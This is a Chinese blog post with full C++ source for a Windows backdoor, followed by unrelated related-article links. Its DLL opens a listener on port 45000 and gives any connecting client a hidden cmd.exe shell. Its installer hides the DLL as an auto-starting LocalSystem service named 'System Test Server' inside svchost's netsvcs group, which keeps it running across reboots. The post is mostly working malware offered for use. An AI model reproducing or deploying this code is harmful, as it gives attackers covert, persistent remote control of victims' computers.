安全之路 —— 利用SVCHost.exe系统服务实现后门自启动
简介
在Windows系统中有一个系统服务控制器,叫做SVCHost.exe,它可以用来管理系统的多组服务。它与普通的服务控制不同的是它采用dll导出的ServiceMain主函数实现服务运行,详细原理可参照Blog:SVCHOST启动服务实战。我们在使用此方法时,要有两个步骤:
- 编写dll文件封装ServiceMain导出函数
- 编写负责服务安装与移除的exe文件
- 本例中需要将.exe与.dll文件放置在同一个文件夹下运行,.exe文件会将dll复制进系统目录。
C++代码样例
- DLL程序代码:
///////////////////////////////////////
//
// FileName : sysWork.cpp
// Creator : PeterZ1997
// Date : 2018-5-8 22:07
// Comment : Dll of ServiceMain Function
//
///////////////////////////////////////
#include <cstdio>
#include <iostream>
#include <cstdlib>
#include <cstring>
#include <strsafe.h>
#include <WinSock2.h>
#include <winsock.h>
#include <windows.h>
#include <winsvc.h>
using namespace std;
#pragma comment(lib, "ws2_32.lib")
SERVICE_STATUS g_ServiceStatus;
SERVICE_STATUS_HANDLE g_hServiceStatus;
const unsigned int MAX_COUNT = 255; /// String Max Length
const DWORD PORT = 45000; /// Listen Port
const unsigned int LINK_COUNT = 30; /// Max Link Number
/**
* @brief CallBack Function to Translate Service Control Code
* @param dwCode Service Control Code
*/
void WINAPI ServiceControl(DWORD dwCode)
{
switch (dwCode)
{
//服务暂停
case SERVICE_CONTROL_PAUSE:
g_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
//服务继续
case SERVICE_CONTROL_CONTINUE:
g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
//服务停止
case SERVICE_CONTROL_STOP:
g_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
g_ServiceStatus.dwWin32ExitCode = 0;
g_ServiceStatus.dwCheckPoint = 0;
g_ServiceStatus.dwWaitHint = 0;
break;
case SERVICE_CONTROL_INTERROGATE:
break;
default:
break;
}
//设置服务状态
if (SetServiceStatus(g_hServiceStatus, &g_ServiceStatus) == 0)
{
printf("Set Service Status Error\n");
}
return;
}
/**
* @brief Start Remote Shell
* @param lpParam the Client Handle
*/
DWORD WINAPI StartShell(LPVOID lpParam)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
CHAR cmdline[MAX_COUNT] = { 0 };
GetStartupInfo(&si);
si.cb = sizeof(STARTUPINFO);
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)lpParam;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
GetSystemDirectory(cmdline, sizeof(cmdline));
strcat_s(cmdline, sizeof(cmdline), "\\cmd.exe");
while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))
{
Sleep(100);
}
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return 0;
}
/**
* @brief Service Running Function
* @param lpParam NULL
*/
DWORD WINAPI RunService(LPVOID lpParam)
{
CHAR wMessage[MAX_COUNT] = "<================= Welcome to Back Door >_< ==================>\n";
SOCKET sClient[30];
DWORD dwThreadId[30];
HANDLE hThread[30];
WSADATA wsd;
if (WSAStartup(0x0202, &wsd))
{
printf("WSAStartup Process Error\n");
return 0;
}
SOCKET sListen = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(PORT);
sin.sin_addr.S_un.S_addr = INADDR_ANY;
if (bind(sListen, (LPSOCKADDR)&sin, sizeof(sin))) return 0;
if (listen(sListen, LINK_COUNT)) return 0;
for (int i = 0; i < LINK_COUNT; i++)
{
sClient[i] = accept(sListen, NULL, NULL);
hThread[i] = CreateThread(NULL, 0, StartShell, (LPVOID)sClient[i], 0, &dwThreadId[i]);
send(sClient[i], wMessage, strlen(wMessage), 0);
}
WaitForMultipleObjects(LINK_COUNT, hThread, TRUE, INFINITE);
return 0;
}
/**
* @brief Export Function
*/
extern"C" __declspec(dllexport) void __stdcall ServiceMain(DWORD dwArgc, LPTSTR *lpArgv)
{
HANDLE hThread;
g_ServiceStatus.dwCheckPoint = 0;
g_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_STOP;
g_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
g_ServiceStatus.dwServiceSpecificExitCode = 0;
g_ServiceStatus.dwServiceType = SERVICE_WIN32;
g_ServiceStatus.dwWaitHint = 0;
g_ServiceStatus.dwWin32ExitCode = 0;
g_hServiceStatus = RegisterServiceCtrlHandler("BackDoor", ServiceControl);
if (!g_hServiceStatus)
{
printf("Register Service Error\n");
return;
}
g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
g_ServiceStatus.dwCheckPoint = 0;
g_ServiceStatus.dwWaitHint = 0;
if (!SetServiceStatus(g_hServiceStatus, &g_ServiceStatus))
{
printf("Set ServiceStatus Error !\n");
return;
}
hThread = CreateThread(NULL, 0, RunService, NULL, 0, NULL);
if (!hThread)
{
printf("Create Thread Error\n");
}
return;
}
/**
* @brief DLL Main Function
*/
BOOL APIENTRY DllMain(HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_DETACH:
{
ServiceControl(SERVICE_CONTROL_STOP);
break;
}
default:
break;
}
return TRUE;
}
2 . EXE程序代码:
//////////////////////////////////////////////
//
// FileName : SVCHostDemo.cpp
// Creator : PeterZ1997
// Date : 2018-5-8 01:17
// Comment : use SVCHost.exe to achieve software auto-run
//
//////////////////////////////////////////////
#include <iostream>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include "strsafe.h"
#include <windows.h>
#include <winsvc.h>
#include <shlwapi.h>
#pragma comment(lib, "shlwapi.lib")
using namespace std;
const unsigned int MAX_COUNT = 255; //字符串长度
CHAR szRegInfo[MAX_COUNT] = "\0"; //注册表信息缓冲区
SC_HANDLE g_hServiceHandle; //服务实例句柄
SERVICE_STATUS g_ssServiceStatus; //服务状态结构体
SERVICE_STATUS_HANDLE g_ssServiceHandle; //服务状态句柄
/**
* @brief 封装REG_MULTI_SZ型注册表操作
* @param hRoot root key
* @param szSubKey sub key after the root key
* @param szValueName key name
* @param szData key Data
* @param cp length of (BYTE*)szValue
*/
BOOL setSZMultiStringValueToReg(HKEY hRoot, LPCSTR szSubKey, LPCSTR szValueName, LPSTR szValue, DWORD cp)
{
HKEY hKey;
long lRet;
if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_MULTI_SZ, (BYTE*)szValue, cp)) return false;
RegCloseKey(hKey);
RegCloseKey(hRoot);
return true;
}
/**
* @brief 封装REG_SZ型注册表操作
* @param hRoot root key
* @param szSubKey sub key after the root key
* @param szValueName key name
* @param szData key Data
*/
BOOL setSZStringValueToReg(HKEY hRoot, LPCSTR szSubKey, LPCSTR szValueName, LPCSTR szValue)
{
HKEY hKey;
long lRet;
if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_SZ, (BYTE*)szValue, strlen(szValue))) return false;
RegCloseKey(hKey);
RegCloseKey(hRoot);
return true;
}
/**
* @brief 封装REG_EXPAND_SZ型注册表操作
* @param hRoot root key
* @param szSubKey sub key after the root key
* @param szValueName key name
* @param szData key Data
*/
BOOL setExpandSZStringValueToReg(HKEY hRoot, LPCSTR szSubKey, LPCSTR szValueName, LPCSTR szValue)
{
HKEY hKey;
long lRet;
if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_EXPAND_SZ, (BYTE*)szValue, strlen(szValue))) return false;
RegCloseKey(hKey);
RegCloseKey(hRoot);
return true;
}
/**
* @brief 封装DWORD型注册表操作
* @param hRoot root key
* @param szSubKey sub key after the root key
* @param szValueName key name
* @param szData key Data
*/
BOOL setDWORDValueToReg(HKEY hRoot, LPCSTR szSubKey, LPCSTR szValueName, DWORD szValue)
{
HKEY hKey;
long lRet;
if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_DWORD, (BYTE*)&szValue, sizeof(DWORD))) return false;
RegCloseKey(hKey);
RegCloseKey(hRoot);
return true;
}
/**
* @brief get Registry Value Info(REG_MULTI_SZ)
* @param hRoot root key
* @param szSubKey sub key after the root key
* @param szValueName key name
*/
BOOL getRegInfo(HKEY hRoot, LPCTSTR szSubKey, LPCTSTR szValueName)
{
HKEY hKey;
DWORD dwType = REG_MULTI_SZ;
DWORD dwLenData = strlen(szRegInfo);
LONG lRes = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lRes != ERROR_SUCCESS)
{
RegCloseKey(hKey);
RegCloseKey(hRoot);
return false;
}
RegQueryValueEx(hKey, szValueName, 0, &dwType, NULL, &dwLenData);
lRes = RegQueryValueEx(hKey, szValueName, 0, &dwType, (LPBYTE)szRegInfo, &dwLenData);
if (lRes != ERROR_SUCCESS)
{
RegCloseKey(hKey);
RegCloseKey(hRoot);
return false;
}
RegCloseKey(hKey);
RegCloseKey(hRoot);
return true;
}
/**
* @brief CallBack Function to Translate Service Control Code
* @param dwCode Service Control Code
*/
void WINAPI ServiceControl(DWORD dwCode)
{
switch (dwCode)
{
case SERVICE_CONTROL_PAUSE:
g_ssServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
g_ssServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
g_ssServiceStatus.dwCurrentState = SERVICE_STOPPED;
g_ssServiceStatus.dwWin32ExitCode = 0;
g_ssServiceStatus.dwCheckPoint = 0;
g_ssServiceStatus.dwWaitHint = 0;
break;
case SERVICE_CONTROL_INTERROGATE:
break;
default:
break;
}
if (SetServiceStatus(g_ssServiceHandle, &g_ssServiceStatus) == 0)
{
printf("Set Service Status Error\n");
}
return;
}
/**
* @brief 安装服务
*/
BOOL InstallService()
{
CHAR szSysPath[MAX_COUNT] = "\0";
CHAR szRegGroup[MAX_COUNT][MAX_COUNT] = { "\0" };
CHAR* szTargetString = (CHAR*)malloc(MAX_COUNT * 8);
memset(szTargetString, 0, sizeof(szTargetString));
register int count = 0;
register int cp = 0;
GetSystemDirectory(szSysPath, sizeof(szSysPath));
StringCchCat(szSysPath, sizeof(szSysPath), "\\sysWork.dll");
CopyFile("sysWork.dll", szSysPath, true);
setSZStringValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "Description", "System Test Server");
setSZStringValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "DisplayName", "NewService");
setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "ErrorControl", 0x00000001);
setExpandSZStringValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "ImagePath", "%systemRoot%\\system32\\svchost.exe -k netsvcs");
setSZStringValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "ObjectName", "LocalSystem");
setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "Start", 0x00000002);
setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "Type", 0x00000010);
setExpandSZStringValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService\\Parameters", "ServiceDll", szSysPath);
getRegInfo(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", "netsvcs");
register LPSTR p = LPSTR(szRegInfo);
for (; *p; p += strlen(p) + 1, count++)
{
StringCchCopy(szRegGroup[count], sizeof(szRegGroup[count]), p);
}
StringCchCopy(szRegGroup[count], sizeof(szRegGroup), "NewService");
p = LPSTR(szTargetString);
for (int i = 0; i <= count; i++)
{
strcpy_s(p, strlen(szRegGroup[i]) + 1, szRegGroup[i]);
p += strlen(szRegGroup[i]) + 1;
cp += strlen(szRegGroup[i]) + 1;
}
setSZMultiStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", "netsvcs", szTargetString, cp);
return true;
}
/**
* @brief 移除服务
*/
BOOL RemoveService()
{
SC_HANDLE hscManager;
CHAR szRegGroup[MAX_COUNT][MAX_COUNT] = { "\0" };
CHAR* szTargetString = (CHAR*)malloc(MAX_COUNT * 8);
memset(szTargetString, 0, sizeof(szTargetString));
register int count = 0;
register int cp = 0;
CHAR szSysPath[MAX_COUNT] = "\0";
GetSystemDirectory(szSysPath, sizeof(szSysPath));
StringCchCat(szSysPath, sizeof(szSysPath), "\\sysWork.dll");
hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (!hscManager)
{
printf("Open Service Manager Error\n");
return false;
}
printf("Open Service Manager Success\n");
g_hServiceHandle = OpenService(hscManager, "NewService", SERVICE_ALL_ACCESS);
if (!g_hServiceHandle)
{
printf("Open Service Error\n");
return false;
}
printf("Open Service Success\n");
if (QueryServiceStatus(g_hServiceHandle, &g_ssServiceStatus))
{
if (g_ssServiceStatus.dwCurrentState == SERVICE_RUNNING)
{
ControlService(g_hServiceHandle, SERVICE_CONTROL_STOP, &g_ssServiceStatus);
}
}
else
{
printf("Service Status Get Error\n");
CloseServiceHandle(g_hServiceHandle);
CloseServiceHandle(hscManager);
return false;
}
if (!DeleteService(g_hServiceHandle))
{
printf("Delete Service Error\n");
CloseServiceHandle(g_hServiceHandle);
CloseServiceHandle(hscManager);
return false;
}
if (SHDeleteKey(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService"))
{
printf("Delete RegKey Error\n");
CloseServiceHandle(g_hServiceHandle);
CloseServiceHandle(hscManager);
return false;
}
memset(szRegInfo, 0, sizeof(szRegInfo));
getRegInfo(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", "netsvcs");
register LPSTR p = LPSTR(szRegInfo);
for (; *p; p += strlen(p) + 1)
{
if (!strcmp(p, "NewService"))
{
continue;
}
StringCchCopy(szRegGroup[count], sizeof(szRegGroup[count]), p);
count++;
}
p = LPSTR(szTargetString);
for (int i = 0; i <= count; i++)
{
strcpy_s(p, strlen(szRegGroup[i]) + 1, szRegGroup[i]);
p += strlen(szRegGroup[i]) + 1;
cp += strlen(szRegGroup[i]) + 1;
}
setSZMultiStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", "netsvcs", szTargetString, cp);
printf("Remove Service Success\n");
DeleteFile(szSysPath);
CloseServiceHandle(g_hServiceHandle);
CloseServiceHandle(hscManager);
return true;
}
/**
* @brief Main Function
*/
int main(int argc, char* argv[])
{
if (argc == 2)
{
if (!stricmp(argv[1], "--install"))
{
if (!InstallService())
{
printf("[!]Service Operation Error\n");
}
else
{
printf("[*]Service Operation Success\n");
}
}
else if (!stricmp(argv[1], "--remove"))
{
if (!RemoveService())
{
printf("[!]Service Operation Error\n");
}
else
{
printf("[*]Service Operation Success\n");
}
}
else
{
printf("[Usage] => *.exe [--install]/[--remove]\n");
}
}
else {
printf("[Usage] => *.exe [--install]/[--remove]\n");
}
return 0;
}
安全之路 —— 利用SVCHost.exe系统服务实现后门自启动的更多相关文章
- 电脑Svchost.exe 进程占CPU100% 的解决办法
Windows Update诊断和修复修复工具 http://support.microsoft.com/mats/windows_update/zh-cn Svchost.exe占用CPU100%的 ...
- 关于WIN7 内存占用很大的 问题svchost.exe
svchost.exe 是用来启动系统服务的,所以某个 svchost.exe 占用内存过大,可能就是它启动的那个服务占用内存过大,所以只要停止并禁用那个服务就行了. 一般来说占用内存最大的服务是 S ...
- win7 64位的 svchost.exe 占用内存过大的问题
svchost.exe 是用来启动系统服务的,所以某个 svchost.exe 占用内存过大,可能就是它启动的那个服务占用内存过大,所以只要停止并禁用那个服务就行了. 一般来说占用内存最大的服务是 S ...
- windows svchost.exe 引起的出现的莫名其妙的窗口失去焦点
我不知道你们遇到没,反正我是遇到了,现在我就把解决方法给你们,当然都是从网上整理下来的 这个失去焦点可以分为两种,一种是病毒,一种是系统自带的问题 首先你得知道自己的窗口被什么给挤掉了焦点 先看看这篇 ...
- 利用certutil.exe实现在批处理(bat)中嵌入可执行文件或者各种媒体、图片之类二进制文件的简单方法!
实际上利用certutil.exe 把二进制文件(包括各种文件,exe可执行程序,图片,声音,mp3) 经过base64编码为文本,可以实现把这些文件嵌入到批处理代码中. 有什么用?: 举个例子,批处 ...
- win10 svchost.exe (LocalSystemNetworkRestricted)大量读写数据
博主的笔记本联想Y50开机完毕后会不停滴读硬盘/写硬盘,导致开机后一段时间内无法正常使用电脑(硬盘读写高峰期).打开资源监视器发现是"svchost.exe (LocalSystemNetw ...
- 解析利用wsdl.exe生成webservice代理类的详解
利用wsdl.exe生成webservice代理类:根据提供的wsdl生成webservice代理类1.开始->程序->Visual Studio 2005 命令提示2.输入如下红色标记部 ...
- win7的svchost.exe占用内存过高如何解决
方法/步骤 1 在我的电脑上点击鼠标右键,选择[管理] 步骤阅读 2 选择右侧[服务和应用程序]下的[服务]选项 步骤阅读 3 找到名称我Superfetch的服务,双击鼠标左键. 步骤阅读 4 选择 ...
- svchost.exe是什么?为什么一直在运行
原文:http://www.howtogeek.com/howto/windows-vista/what-is-svchostexe-and-why-is-it-running/ 自己简单翻译了下,图 ...
随机推荐
- Tomcat学习总结(3)——Tomcat优化详细教程
Tomcat是我们经常使用的 servlet容器之一,甚至很多线上产品都使用 Tomcat充当服务器.而且优化后的Tomcat性能提升显著,本文从以下几方面进行分析优化. 一.内存优化 默认情况下To ...
- Hibernate杂问
1 谈谈你对ORM框架的基本思想的了解? 首先 ORM是 对象关系映射,是为了解决类似于JDBC实现对象持久化的问题开发的. 框架的基本特征:完成面向对象的编程语言到关系数据库之间的映射. 他的映射分 ...
- POJ 2771 Guardian of Decency(最大独立集数=顶点数-最大匹配数)
题目链接: http://poj.org/problem?id=2771 Description Frank N. Stein is a very conservative high-school t ...
- zoj 1760 Doubles(set集合容器的应用)
题目链接: http://acm.zju.edu.cn/onlinejudge/showProblem.do?problemCode=1760 题目描述: As part of an arithmet ...
- vue实用组件——表格
之前用了一下vue-bootstrap,感觉里面的表格组件特别好用,但是如果仅仅为了使用表格就引入bootstrap,似乎有点不划算.所以自己就试着实现了一下bootstrap里面表格的部分功能,目前 ...
- C# Owin 创建与测试自己的中间件Middleware(二)
本文纯属介绍怎么简单地创建自己的Owin.还没有理解owin概念的请看上一篇文章:http://www.cnblogs.com/alunchen/p/7049307.html 目录 1.创建项目 2. ...
- MVC应用程序显示Flash(swf)视频
前段时间, Insus.NET有实现<MVC使用Flash来显示图片>http://www.cnblogs.com/insus/p/3598941.html 在演示中,它也可以显示Flas ...
- 将ABP的数据库从SQLSERVER迁移到MySql
摘要:之前跟着网上的一些教程,学习了一点ABP的知识.最近想说把默认的SQLSERVER数据迁移到mysql吧 首先网上搜一波 安装MySql.Data.Entity 然后你需要安装 MySql.Da ...
- Java 支付宝支付,退款,单笔转账到支付宝账户(支付宝订单退款)
上一篇写到支付宝的支付,这代码copy下来就能直接用了, 我写学习文档时会经常贴 官方参数文档的案例地址, 因为我觉得 请求参数,响应参数说明 官方文档整理的很好,毕竟官方不会误导大家. 我学一个 ...
- 生成证书申请csr文件
一.执行命令 openssl req -nodes -newkey rsa:2048 -keyout liexiulive.key -out liexiulive.csr 二.根据提示输入基本信息 G ...